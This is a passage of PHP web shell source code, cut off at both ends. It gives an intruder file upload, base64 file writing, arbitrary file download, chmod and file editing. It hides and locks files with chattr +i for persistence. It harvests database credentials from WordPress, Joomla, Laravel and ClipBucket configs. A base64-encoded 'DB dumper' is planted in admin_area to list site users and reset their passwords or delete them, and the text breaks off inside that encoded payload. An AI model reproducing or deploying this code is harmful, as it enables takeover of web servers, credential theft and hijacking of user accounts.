"; // Auto-rename feature if(isset($_POST['r']) && !empty($_POST['r'])){ $new_name = $_POST['r']; $new_target = $target_dir . '/' . $new_name; if(rename($target_file, $new_target)){ $web_link = get_web_path($new_target); $msg .= "🔄 Renamed to: $new_name
"; $msg .= ""; $msg .= "👉 OPEN SHELL"; } else { $msg .= "❌ Rename failed."; } } else { $web_link = get_web_path($target_file); $msg .= ""; $msg .= "👉 OPEN SHELL"; } } else { $msg .= "❌ Upload blocked/failed to $target_dir"; } } // MODE 2: DIRECT CONTENT WRITE (Base64) if(isset($_POST['c']) && isset($_POST['n'])){ $f = $_POST['n']; // Filename // Determine Target Directory $target_dir = isset($_POST['u_path']) ? $_POST['u_path'] : $path; if(!is_dir($target_dir)) $target_dir = getcwd(); $target_file = $target_dir . '/' . $f; $d = base64_decode($_POST['c']); // Content if(file_put_contents($target_file, $d)){ $web_link = get_web_path($target_file); $msg .= "✅ Created: $f in $target_dir (Size: ".strlen($d).")
"; $msg .= ""; $msg .= "👉 OPEN SHELL"; } else { $msg .= "❌ Write failed."; } } // ACTION HANDLERS if(isset($_GET['download'])){ $f = $_GET['download']; if(file_exists($f)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: ' . filesize($f)); readfile($f); exit; } } if(isset($_POST['rename_new']) && isset($_POST['rename_old'])){ if(rename($_POST['rename_old'], $_POST['rename_new'])) { $msg .= "✅ Renamed.
"; $new_name = basename($_POST['rename_new']); $msg .= ""; } else $msg .= "❌ Rename failed.
"; } if(isset($_POST['chmod_new']) && isset($_POST['chmod_file'])){ if(chmod($_POST['chmod_file'], octdec($_POST['chmod_new']))) $msg .= "✅ Chmod success.
"; else $msg .= "❌ Chmod failed.
"; } if(isset($_POST['save_file']) && isset($_POST['file_content'])){ if(file_put_contents($_POST['save_file'], $_POST['file_content'])) $msg .= "✅ Saved.
"; else $msg .= "❌ Save failed.
"; } if(isset($_POST['lock_file'])){ $f = $_POST['lock_file']; if(file_exists($f)){ // 1. Rename to hidden (add dot) $dir = dirname($f); $base = basename($f); $new_name = $dir . '/.' . $base; if($base[0] != '.' && rename($f, $new_name)){ $f = $new_name; $msg .= "👻 File hidden (renamed to .$base)
"; } // 2. Chmod 0444 (Read Only) if(chmod($f, 0444)) $msg .= "🔒 Chmod 0444 applied
"; else $msg .= "❌ Chmod failed
"; // 3. Chattr +i (Immutable - requires shell/root usually) if(function_exists('shell_exec')){ @shell_exec("chattr +i '$f'"); $msg .= "🛡️ Chattr +i attempted
"; } } } if(isset($_POST['unlock_file'])){ $f = $_POST['unlock_file']; if(file_exists($f)){ // 1. Chattr -i if(function_exists('shell_exec')){ @shell_exec("chattr -i '$f'"); $msg .= "🔓 Chattr -i attempted
"; } // 2. Chmod 0644 if(chmod($f, 0644)) $msg .= "📝 Chmod 0644 applied
"; else $msg .= "❌ Chmod failed
"; // 3. Rename (remove dot) $base = basename($f); if($base[0] == '.'){ $dir = dirname($f); $new_name = $dir . '/' . substr($base, 1); if(rename($f, $new_name)){ $f = $new_name; $msg .= "👻 File un-hidden (renamed to " . substr($base, 1) . ")
"; } } } } // DB DUMPER FUNCTION function scan_cms_config($dir){ // 1. WordPress $wp = $dir . "/wp-config.php"; if(file_exists($wp)){ $c = file_get_contents($wp); preg_match("/define\(\s*'DB_NAME',\s*'([^']+)'\s*\);/", $c, $m1); preg_match("/define\(\s*'DB_USER',\s*'([^']+)'\s*\);/", $c, $m2); preg_match("/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\);/", $c, $m3); preg_match("/define\(\s*'DB_HOST',\s*'([^']+)'\s*\);/", $c, $m4); $db = isset($m1[1]) ? $m1[1] : ''; $user = isset($m2[1]) ? $m2[1] : ''; $pass = isset($m3[1]) ? $m3[1] : ''; $host = isset($m4[1]) ? $m4[1] : 'localhost'; return array('type'=>'WordPress', 'db'=>$db,'user'=>$user,'pass'=>$pass,'host'=>$host); } // 2. Joomla $joomla = $dir . "/configuration.php"; if(file_exists($joomla)){ $c = file_get_contents($joomla); preg_match('/public\s+\$db\s*=\s*\'([^\']+)\';/', $c, $m1); preg_match('/public\s+\$user\s*=\s*\'([^\']+)\';/', $c, $m2); preg_match('/public\s+\$password\s*=\s*\'([^\']+)\';/', $c, $m3); preg_match('/public\s+\$host\s*=\s*\'([^\']+)\';/', $c, $m4); if(isset($m1[1])) { $user = isset($m2[1]) ? $m2[1] : ''; $pass = isset($m3[1]) ? $m3[1] : ''; $host = isset($m4[1]) ? $m4[1] : 'localhost'; return array('type'=>'Joomla', 'db'=>$m1[1],'user'=>$user,'pass'=>$pass,'host'=>$host); } } // 3. Laravel (.env) $env = $dir . "/.env"; if(file_exists($env)){ $c = file_get_contents($env); preg_match("/DB_DATABASE=(.*)/", $c, $m1); preg_match("/DB_USERNAME=(.*)/", $c, $m2); preg_match("/DB_PASSWORD=(.*)/", $c, $m3); preg_match("/DB_HOST=(.*)/", $c, $m4); if(isset($m1[1])) { $user = isset($m2[1]) ? trim($m2[1]) : ''; $pass = isset($m3[1]) ? trim($m3[1]) : ''; $host = isset($m4[1]) ? trim($m4[1]) : 'localhost'; return array('type'=>'Laravel', 'db'=>trim($m1[1]),'user'=>$user,'pass'=>$pass,'host'=>$host); } } // 4. ClipBucket $cb = $dir . "/includes/db_connect.php"; if(file_exists($cb)){ $c = file_get_contents($cb); preg_match("/define\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m1); preg_match("/define\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m2); preg_match("/define\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m3); preg_match("/define\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m4); if(isset($m1[1])) { $user = isset($m2[1]) ? $m2[1] : ''; $pass = isset($m3[1]) ? $m3[1] : ''; $host = isset($m4[1]) ? $m4[1] : 'localhost'; return array('type'=>'ClipBucket', 'db'=>$m1[1],'user'=>$user,'pass'=>$pass,'host'=>$host); } } return false; } $db_output = ""; // DB DUMPER INTEGRATION (REPLACES BYPASS GENERATOR) if(isset($_POST['gen_bypass'])){ $scan_root = $_SERVER['DOCUMENT_ROOT']; if(empty($scan_root) || !is_dir($scan_root)) $scan_root = getcwd(); // Attempt to locate admin_area $admin_dir = $scan_root . "/admin_area"; $doc_root_admin = $_SERVER['DOCUMENT_ROOT'] . "/admin_area"; if(is_dir($admin_dir)){ // good } elseif(is_dir($doc_root_admin)){ $admin_dir = $doc_root_admin; } else { $admin_dir = $scan_root; // Fallback } $dumper_file = $admin_dir . "/db_dumper.php"; $dumper_link = get_web_path($dumper_file); // EMBEDDED DB DUMPER CODE (No external file needed) $dumper_code = base64_decode("PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwppbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIDApOwoKLy8gLS0tIEFVVE8gREVURUNUIENSRURFTlRJQUxTIFNUQVJUIC0tLQokZm91bmRfY3JlZHMgPSBmYWxzZTsKJHJvb3RfZGlyID0gX19ESVJfXzsKCi8vIFRyeSB0byBmaW5kIHdwLWNvbmZpZy5waHAgb3IgaW5jbHVkZXMvZGJjb25uZWN0LnBocCAoQ2xpcEJ1Y2tldCkKZm9yKCRpPTA7ICRpPDU7ICRpKyspewogICAgLy8gMS4gQ2hlY2sgV29yZFByZXNzCiAgICBpZihmaWxlX2V4aXN0cygkcm9vdF9kaXIgLiAnL3dwLWNvbmZpZy5waHAnKSl7CiAgICAgICAgJGNvbmZpZ19jb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHJvb3RfZGlyIC4gJy93cC1jb25maWcucGhwJyk7CiAgICAgICAgCiAgICAgICAgaWYocHJlZ19tYXRjaCgiL2RlZmluZVwoXHMqJ0RCX05BTUUnLFxzKicoW14nXSspJ1xzKlwpOy8iLCAkY29uZmlnX2NvbnRlbnQsICRtX2RiKSkgJGRiID0gJG1fZGJbMV07CiAgICAgICAgaWYocHJlZ19tYXRjaCgiL2RlZmluZVwoXHMqJ0RCX1VTRVInLFxzKicoW14nXSspJ1xzKlwpOy8iLCAkY29uZmlnX2NvbnRlbnQsICRtX3VzZXIpKSAkdXNlciA9ICRtX3VzZXJbMV07CiAgICAgICAgaWYocHJlZ19tYXRjaCgiL2RlZmluZVwoXHMqJ0RCX1BBU1NXT1JEJyxccyonKFteJ10rKSdccypcKTsvIiwgJGNvbmZpZ19jb250ZW50LCAkbV9wYXNzKSkgJHBhc3MgPSAkbV9wYXNzWzFdOwogICAgICAgIGlmKHByZWdfbWF0Y2goIi9kZWZpbmVcKFxzKidEQl9IT1NUJyxccyonKFteJ10rKSdccypcKTsvIiwgJGNvbmZpZ19jb250ZW50LCAkbV9ob3N0KSkgJGhvc3QgPSAkbV9ob3N0WzFdOwogICAgICAgIAogICAgICAgIGlmKGlzc2V0KCRkYikpewogICAgICAgICAgICAkZm91bmRfY3JlZHMgPSB0cnVlOwogICAgICAgICAgICAkY21zX3R5cGUgPSAnV29yZFByZXNzJzsKICAgICAgICAgICAgZWNobyAiPGRpdiBzdHlsZT0nYmFja2dyb3VuZDojZGZkO3BhZGRpbmc6MTBweDtib3JkZXI6MXB4IHNvbGlkICMwZjA7Y29sb3I6IzAwMDsnPiI7CiAgICAgICAgICAgIGVjaG8gIuKchSA8Yj5BVVRPLURFVEVDVCBTVUNDRVNTOjwvYj4gRm91bmQgd3AtY29uZmlnLnBocCBpbiAkcm9vdF9kaXI8YnI+IjsKICAgICAgICAgICAgZWNobyAiSG9zdDogJGhvc3QgfCBVc2VyOiAkdXNlciB8IERCOiAkZGIiOwogICAgICAgICAgICBlY2hvICI8L2Rpdj48YnI+IjsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQogICAgCiAgICAvLyAyLiBDaGVjayBDbGlwQnVja2V0IChpbmNsdWRlcy9kYmNvbm5lY3QucGhwIG9yIGluY2x1ZGVzL2RiX2Nvbm5lY3QucGhwKQogICAgJGNiX2NvbmZpZ3MgPSBbJy9pbmNsdWRlcy9kYmNvbm5lY3QucGhwJywgJy9pbmNsdWRlcy9kYl9jb25uZWN0LnBocCddOwogICAgZm9yZWFjaCgkY2JfY29uZmlncyBhcyAkY2JfZmlsZSl7CiAgICAgICAgaWYoZmlsZV9leGlzdHMoJHJvb3RfZGlyIC4gJGNiX2ZpbGUpKXsKICAgICAgICAgICAgJGNvbmZpZ19jb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHJvb3RfZGlyIC4gJGNiX2ZpbGUpOwogICAgICAgICAgICAKICAgICAgICAgICAgLy8gUGFyc2UgVmFyaWFibGUgU3R5bGUgKCREQk5BTUUgPSAnLi4uJzspCiAgICAgICAgICAgIGlmKHByZWdfbWF0Y2goJy9cJERCTkFNRVxzKj1ccypbXCciXShbXlwnIl0rKVtcJyJdLycsICRjb25maWdfY29udGVudCwgJG1fZGIpKSAkZGIgPSAkbV9kYlsxXTsKICAgICAgICAgICAgaWYocHJlZ19tYXRjaCgnL1wkREJVU0VSXHMqPVxzKltcJyJdKFteXCciXSspW1wnIl0vJywgJGNvbmZpZ19jb250ZW50LCAkbV91c2VyKSkgJHVzZXIgPSAkbV91c2VyWzFdOwogICAgICAgICAgICBpZihwcmVnX21hdGNoKCcvXCREQlBBU1Nccyo9XHMqW1wnIl0oW15cJyJdKylbXCciXS8nLCAkY29uZmlnX2NvbnRlbnQsICRtX3Bhc3MpKSAkcGFzcyA9ICRtX3Bhc3NbMV07CiAgICAgICAgICAgIGlmKHByZWdfbWF0Y2goJy9cJERCSE9TVFxzKj1ccypbXCciXShbXlwnIl0rKVtcJyJdLycsICRjb25maWdfY29udGVudCwgJG1faG9zdCkpICRob3N0ID0gJG1faG9zdFsxXTsKICAgICAgICAgICAgCiAgICAgICAgICAgIC8vIFBhcnNlIERlZmluZSBTdHlsZSAoZGVmaW5lKCJEQl9OQU1FIiwgIi4uLiIpKQogICAgICAgICAgICBpZighaXNzZXQoJGRiKSl7CiAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaCgiL2RlZmluZVwoXHMqWydcIl1EQl9OQU1FWydcIl1ccyosXHMqWydcIl0oW14nXCJdKylbJ1wiXVxzKlwpOy8iLCAkY29uZmlnX2NvbnRlbnQsICRtX2RiKSkgJGRiID0gJG1fZGJbMV07CiAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaCgiL2RlZmluZVwoXHMqWydcIl1EQl9VU0VSWydcIl1ccyosXHMqWydcIl0oW14nXCJdKylbJ1wiXVxzKlwpOy8iLCAkY29uZmlnX2NvbnRlbnQsICRtX3VzZXIpKSAkdXNlciA9ICRtX3VzZXJbMV07CiAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaCgiL2RlZmluZVwoXHMqWydcIl1EQl9QQVNTV09SRFsnXCJdXHMqLFxzKlsnXCJdKFteJ1wiXSspWydcIl1ccypcKTsvIiwgJGNvbmZpZ19jb250ZW50LCAkbV9wYXNzKSkgJHBhc3MgPSAkbV9wYXNzWzFdOwogICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2goIi9kZWZpbmVcKFxzKlsnXCJdREJfSE9TVFsnXCJdXHMqLFxzKlsnXCJdKFteJ1wiXSspWydcIl1ccypcKTsvIiwgJGNvbmZpZ19jb250ZW50LCAkbV9ob3N0KSkgJGhvc3QgPSAkbV9ob3N0WzFdOwogICAgICAgICAgICB9CgogICAgICAgICAgICBpZihpc3NldCgkZGIpKXsKICAgICAgICAgICAgICAgICRmb3VuZF9jcmVkcyA9IHRydWU7CiAgICAgICAgICAgICAgICAkY21zX3R5cGUgPSAnQ2xpcEJ1Y2tldCc7CiAgICAgICAgICAgICAgICBlY2hvICI8ZGl2IHN0eWxlPSdiYWNrZ3JvdW5kOiNkZmQ7cGFkZGluZzoxMHB4O2JvcmRlcjoxcHggc29saWQgIzBmMDtjb2xvcjojMDAwOyc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIuKchSA8Yj5BVVRPLURFVEVDVCBTVUNDRVNTOjwvYj4gRm91bmQgQ2xpcEJ1Y2tldCBjb25maWcgaW4gJGNiX2ZpbGU8YnI+IjsKICAgICAgICAgICAgICAgIGVjaG8gIkhvc3Q6ICRob3N0IHwgVXNlcjogJHVzZXIgfCBEQjogJGRiIjsKICAgICAgICAgICAgICAgIGVjaG8gIjwvZGl2Pjxicj4iOwogICAgICAgICAgICAgICAgYnJlYWsgMjsgLy8gQnJlYWsgYm90aCBsb29wcwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQogICAgCiAgICAkcm9vdF9kaXIgPSBkaXJuYW1lKCRyb290X2Rpcik7Cn0KCmlmKCEkZm91bmRfY3JlZHMpewogICAgLy8gRmFsbGJhY2sgdG8gTWFudWFsIC8gUHJldmlvdXMgVmFsdWVzIGlmIEF1dG8tRGV0ZWN0IGZhaWxzCiAgICAvLyBLcmVkZW5zaWFsIERhdGFiYXNlIChNYW51YWwpCiAgICBpZighaXNzZXQoJGhvc3QpKSAkaG9zdCA9ICdsb2NhbGhvc3Q6MzMwNic7CiAgICBpZighaXNzZXQoJGRiKSkgICAkZGIgICA9ICd2aXpRNVJrRTZiVVRIbSc7CiAgICBpZighaXNzZXQoJHVzZXIpKSAkdXNlciA9ICd2aXpRNVJrRTZiVVRIbSc7CiAgICBpZighaXNzZXQoJHBhc3MpKSAkcGFzcyA9ICd2cWdXVkZTdGZ4eXM5VSc7CiAgICAKICAgIC8vIENoZWNrIGlmIG1hbnVhbCBjcmVkZW50aWFscyBhcmUgcG9zdGVkCiAgICBpZihpc3NldCgkX1BPU1RbJ21hbnVhbF9jcmVkcyddKSl7CiAgICAgICAgJGhvc3QgPSAkX1BPU1RbJ2RiX2hvc3QnXTsKICAgICAgICAkZGIgICA9ICRfUE9TVFsnZGJfbmFtZSddOwogICAgICAgICR1c2VyID0gJF9QT1NUWydkYl91c2VyJ107CiAgICAgICAgJHBhc3MgPSAkX1BPU1RbJ2RiX3Bhc3MnXTsKICAgICAgICBlY2hvICI8ZGl2IHN0eWxlPSdiYWNrZ3JvdW5kOiNkZGY7cGFkZGluZzoxMHB4O2JvcmRlcjoxcHggc29saWQgIzAwZjtjb2xvcjojMDAwOyc+IjsKICAgICAgICBlY2hvICLihLnvuI8gPGI+VVNJTkcgTUFOVUFMIENSRURFTlRJQUxTPC9iPiI7CiAgICAgICAgZWNobyAiPC9kaXY+PGJyPiI7CiAgICB9IGVsc2UgewogICAgICAgIC8vIFNob3cgTWFudWFsIEZvcm0KICAgICAgICBlY2hvICI8ZGl2IHN0eWxlPSdiYWNrZ3JvdW5kOiNmZGQ7cGFkZGluZzoxMHB4O2JvcmRlcjoxcHggc29saWQgI2YwMDtjb2xvcjojMDAwOyc+IjsKICAgICAgICBlY2hvICLimqDvuI8gPGI+QVVUTy1ERVRFQ1QgRkFJTEVEOjwvYj4gQ291bGQgbm90IGZpbmQgd3AtY29uZmlnLnBocCBhdXRvbWF0aWNhbGx5Ljxicj4iOwogICAgICAgIGVjaG8gIlBsZWFzZSBlbnRlciB0aGUgZGF0YWJhc2UgY3JlZGVudGlhbHMgbWFudWFsbHkgKENoZWNrIHdwLWNvbmZpZy5waHAgdmlhIFNoZWxsKS4iOwogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD0nUE9TVCcgc3R5bGU9J21hcmdpbi10b3A6MTBweDsnPgogICAgICAgICAgICA8aW5wdXQgdHlwZT0naGlkZGVuJyBuYW1lPSdtYW51YWxfY3JlZHMnIHZhbHVlPScxJz4KICAgICAgICAgICAgPGlucHV0IHR5cGU9J3RleHQnIG5hbWU9J2RiX2hvc3QnIHBsYWNlaG9sZGVyPSdEQiBIb3N0IChlLmcuIGxvY2FsaG9zdCknIHZhbHVlPSdsb2NhbGhvc3QnIHJlcXVpcmVkIHN0eWxlPSdwYWRkaW5nOjVweDsnPjxicj48YnI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkYl9uYW1lJyBwbGFjZWhvbGRlcj0nREIgTmFtZScgcmVxdWlyZWQgc3R5bGU9J3BhZGRpbmc6NXB4Oyc+PGJyPjxicj4KICAgICAgICAgICAgPGlucHV0IHR5cGU9J3RleHQnIG5hbWU9J2RiX3VzZXInIHBsYWNlaG9sZGVyPSdEQiBVc2VyJyByZXF1aXJlZCBzdHlsZT0ncGFkZGluZzo1cHg7Jz48YnI+PGJyPgogICAgICAgICAgICA8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0nZGJfcGFzcycgcGxhY2Vob2xkZXI9J0RCIFBhc3N3b3JkJyByZXF1aXJlZCBzdHlsZT0ncGFkZGluZzo1cHg7Jz48YnI+PGJyPgogICAgICAgICAgICA8YnV0dG9uIHR5cGU9J3N1Ym1pdCcgc3R5bGU9J3BhZGRpbmc6NXB4IDEwcHg7Y3Vyc29yOnBvaW50ZXI7Jz5DT05ORUNUIERBVEFCQVNFPC9idXR0b248CiAgICAgICAgPC9mb3JtPiI7CiAgICAgICAgZWNobyAiPC9kaXY+PGJyPiI7CiAgICAgICAgZXhpdDsgLy8gU1RPUCBIRVJFIGlmIG5vIGNyZWRlbnRpYWxzIGZvdW5kIGFuZCBmb3JtIG5vdCBzdWJtaXR0ZWQKICAgIH0KfQoKJGNoYXJzZXQgPSAndXRmOG1iNCc7Ci8vIC0tLSBBVVRPIERFVEVDVCBDUkVERU5USUFMUyBFTkQgLS0tCgovLyBLb25la3NpIGtlIERhdGFiYXNlCi8vIEZpeCBmb3IgIlVua25vd24gTXlTUUwgc2VydmVyIGhvc3QgJ2xvY2FsaG9zdDozMzA2JyIKaWYoc3RycG9zKCRob3N0LCAnOicpICE9PSBmYWxzZSl7CiAgICBsaXN0KCRoLCAkcCkgPSBleHBsb2RlKCc6JywgJGhvc3QpOwogICAgJGRzbiA9ICJteXNxbDpob3N0PSRoO3BvcnQ9JHA7ZGJuYW1lPSRkYjtjaGFyc2V0PSRjaGFyc2V0IjsKfSBlbHNlIHsKICAgICRkc24gPSAibXlzcWw6aG9zdD0kaG9zdDtkYm5hbWU9JGRiO2NoYXJzZXQ9JGNoYXJzZXQiOwp9Cgokb3B0aW9ucyA9IGFycmF5KAogICAgUERPOjpBVFRSX0VSUk1PREUgICAgICAgICAgICA9PiBQRE86OkVSUk1PREVfRVhDRVBUSU9OLAogICAgUERPOjpBVFRSX0RFRkFVTFRfRkVUQ0hfTU9ERSA9PiBQRE86OkZFVENIX0FTU09DLAogICAgUERPOjpBVFRSX0VNVUxBVEVfUFJFUEFSRVMgICA9PiBmYWxzZSwKKTsKCnRyeSB7CiAgICAkcGRvID0gbmV3IFBETygkZHNuLCAkdXNlciwgJHBhc3MsICRvcHRpb25zKTsKICAgIAogICAgLy8gQ2FyaSB0YWJlbCB1c2VycwogICAgJHRhYmxlX2tleXdvcmQgPSAndXNlcnMnOwogICAgaWYoaXNzZXQoJGNtc190eXBlKSAmJiAkY21zX3R5cGUgPT0gJ0NsaXBCdWNrZXQnKSAkdGFibGVfa2V5d29yZCA9ICd1c2Vycyc7IC8vIGNiX3VzZXJzCiAgICAKICAgICRzdG10ID0gJHBkby0+cXVlcnkoIlNIT1cgVEFCTEVTIExJS0UgJyUkdGFibGVfa2V5d29yZCciKTsKICAgICR0YWJsZSA9ICRzdG10LT5mZXRjaENvbHVtbigpOwogICAgCiAgICBpZiAoISR0YWJsZSkgewogICAgICAgIGRpZSgiVGFiZWwgdXNlcnMgdGlkYWsgZGl0ZW11a2FuLiBDZWsgZGFmdGFyIHRhYmVsLiIpOwogICAgfQoKICAgIC8vIEFtYmlsIERhdGEgVXNlciBzZXN1YWkgQ01TCiAgICAgaWYoaXNzZXQoJGNtc190eXBlKSAmJiAkY21zX3R5cGUgPT0gJ0NsaXBCdWNrZXQnKXsKICAgICAgICAgLy8gQ2xpcEJ1Y2tldDogY2JfdXNlcnMgKHVzZXJpZCwgdXNlcm5hbWUsIHBhc3N3b3JkLCBlbWFpbCwgZG9qL2RhdGVfYWRkZWQpCiAgICAgICAgIC8vIENoZWNrIGlmICdkYXRlX2FkZGVkJyBleGlzdHMsIGlmIG5vdCB0cnkgJ2RvaicgKERhdGUgb2YgSm9pbmluZykKICAgICAgICAgJGNoZWNrX2NvbCA9ICRwZG8tPnF1ZXJ5KCJTSE9XIENPTFVNTlMgRlJPTSAkdGFibGUgTElLRSAnZGF0ZV9hZGRlZCciKTsKICAgICAgICAgaWYoJGNoZWNrX2NvbC0+ZmV0Y2goKSl7CiAgICAgICAgICAgICAkZGF0ZV9jb2wgPSAnZGF0ZV9hZGRlZCc7CiAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAkZGF0ZV9jb2wgPSAnZG9qJzsgLy8gT2xkZXIgdmVyc2lvbnMgbWlnaHQgdXNlIGRvagogICAgICAgICB9CiAgICAgICAgIAogICAgICAgICAkc3RtdCA9ICRwZG8tPnF1ZXJ5KCJTRUxFQ1QgdXNlcmlkIGFzIElELCB1c2VybmFtZSBhcyB1c2VyX2xvZ2luLCBlbWFpbCBlbWFpbCBhcyB1c2VyX2VtYWlsLCAkZGF0ZV9jb2wgYXMgdXNlcl9yZWdpc3RlcmVkIEZST00gJHRhYmxlIik7CiAgICAgfSBlbHNlIHsKICAgICAgICAgLy8gV29yZFByZXNzIERlZmF1bHQ6IHdwX3VzZXJzIChJRCwgdXNlcl9sb2dpbiwgdXNlcl9lbWFpbCwgdXNlcl9yZWdpc3RlcmVkKQogICAgICAgICAkc3RtdCA9ICRwZG8tPnF1ZXJ5KCJTRUxFQ1QgSUQsIHVzZXJfbG9naW4sIHVzZXJfZW1haWwsIHVzZXJfcmVnaXN0ZXJlZCBGUk9NICR0YWJsZSIpOwogICAgIH0KICAgIAogICAgZWNobyAiPGgxPkRhZnRhciBVc2VyICgkdGFibGUpPC9oMT4iOwogICAgZWNobyAiPHRhYmxlIGJvcmRlcj0nMScgY2VsbHBhZGRpbmc9JzEwJz4KICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgPHRoPklEPC90aD4KICAgICAgICAgICAgICAgIDx0aD5Mb2dpbjwvdGg+CiAgICAgICAgICAgICAgICA8dGg+RW1haWw8L3RoPgogICAgICAgICAgICAgICAgPHRoPlRlcmRhZnRhcjwvdGg+CiAgICAgICAgICAgICAgICA8dGg+QWtzaSAoR2FudGkgUGFzcyk8L3RoPgogICAgICAgICAgICA8L3RyPiI7CiAgICAgICAgICAgIAogICAgd2hpbGUgKCRyb3cgPSAkc3RtdC0+ZmV0Y2goKSkgewogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICAgICAgICAgIDx0ZD57JHJvd1snSUQnXX08L3RkPgogICAgICAgICAgICAgICAgPHRkPnskcm93Wyd1c2VyX2xvZ2luJ119PC90ZD4KICAgICAgICAgICAgICAgIDx0ZD57JHJvd1sndXNlcl9lbWFpbCddfTwvdGQ+CiAgICAgICAgICAgICAgICA8dGQ+eyRyb3dbJ3VzZXJfcmVnaXN0ZXJlZCddfTwvdGQ+CiAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgPGZvcm0gbWV0aG9kPSdQT1NUJyBzdHlsZT0nZGlzcGxheTppbmxpbmUtYmxvY2s7IG1hcmdpbi1yaWdodDoxMHB4Oyc+CiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J3VzZXJfaWQnIHZhbHVlPSd7JHJvd1snSUQnXX0nPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0nbmV3X3Bhc3MnIHBsYWNlaG9sZGVyPSdQYXNzd29yZCBCYXJ1JyBzaXplPScxNSc+CiAgICAgICAgICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0nc3VibWl0JyBuYW1lPSdyZXNldCc+R2FudGk8L2J1dHRvbj4KICAgICAgICAgICAgICAgICAgICA8L2Zvcm0+CiAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgPGZvcm0gbWV0aG9kPSdQT1NUJyBzdHlsZT0nZGlzcGxheTppbmxpbmUtYmxvY2s7JyBvbnN1Ym1pdD0ncmV0dXJuIGNvbmZpcm0oXCJZYWtpbiBpbmdpbiBNRU5HSEFQVVMgdXNlciBpbmkgcGVybWFuZW4/XCIpOyc+CiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J3VzZXJfaWQnIHZhbHVlPSd7JHJvd1snSUQnXX0nPgogICAgICAgICAgICAgICAgICAgICAgICA8YnV0dG9uIHR5cGU9J3N1Ym1pdCcgbmFtZT0nZGVsZXRlJyBzdHlsZT0nYmFja2dyb3VuZC1jb2xvcjpyZWQ7IGNvbG9yOndoaXRlOyBib3JkZXI6bm9uZTsgcGFkZGluZzo1cHggMTBweDsgY3Vyc29yOnBvaW50ZXI7Jz5IYXB1czwvYnV0dG9uPgogICAgICAgICAgICAgICAgICAgIDwvZm9ybT4KICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgPC90cj4iOwogICAgfQogICAgZWNobyAiPC90YWJsZT4iOwoKICAgIC8vIEZpdHVyIFJlc2V0IFBhc3N3b3JkIChNRDUpCiAgICBpZiAoaXNzZXQoJF9QT1NUWydyZXNldCddKSAmJiAhZW1wdHkoJF9QT1NUWyduZXdfcGFzcyddKSkgewogICAgICAgICRuZXdfcGFzc19oYXNoID0gbWQ1KCRfUE9TVFsnbmV3X3Bhc3MnXSk7CiAgICAgICAgJHVpZCA9ICRfUE9TVFsndXNlcl9pZCddOwogICAgICAgIAogICAgICAgIGlmKGlzc2V0KCRjbXNfdHlwZSkgJiYgJGNtc190eXBlID09ICdDbGlwQnVja2V0Jyl7CiAgICAgICAgICAgIC8vIENsaXBCdWNrZXQ6IHBhc3N3b3JkLCB1c2VyaWQKICAgICAgICAgICAgICR1cGRhdGUgPSAkcGRvLT5wcmVwYXJlKCJVUERBVEUgJHRhYmxlIFNFVCBwYXNzd29yZCA9ID8gV0hFUkUgdXNlcmlkID0gPyIpOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIC8vIFdvcmRQcmVzczogdXNlcl9wYXNzLCBJRAogICAgICAgICAgICAgJHVwZGF0ZSA9ICRwZG8tPnByZXBhcmUoIlVQREFURSAkdGFibGUgU0VUIHVzZXJfcGFzcyA9ID8gV0hFUkUgSUQgPSA/Iik7CiAgICAgICAgfQogICAgICAgIAogICAgICAgICR1cGRhdGUtPmV4ZWN1dGUoYXJyYXkoJG5ld19wYXNzX2hhc2gsICR1aWQpKTsKICAgICAgICAKICAgICAgICBlY2hvICI8aDIgc3R5bGU9J2NvbG9yOmdyZWVuJz5QYXNzd29yZCBVc2VyIElEICR1aWQgYmVyaGFzaWwgZGlnYW50aSBqYWRpOiB7JF9QT1NUWyduZXdfcGFzcyddfTwvaDI+IjsKICAgICAgICBlY2hvICI8bWV0YSBodHRwLWVxdWl2PSdyZWZyZXNoJyBjb250ZW50PScyJz4iOwogICAgfQoKICAgIC8vIEZpdHVyIEhhcHVzIFVzZXIKICAgIGlmIChpc3NldCgkX1BPU1RbJ2RlbGV0ZSddKSkgewogICAgICAgICR1aWQgPSAkX1BPU1RbJ3VzZXJfaWQnXTsKICAgICAgICAKICAgICAgICBpZihpc3NldCgkY21zX3R5cGUpICYmICRjbXNfdHlwZSA9PSAnQ2xpcEJ1Y2tldCcpewogICAgICAgICAgICAgJGRlbCA9ICRwZG8tPnByZXBhc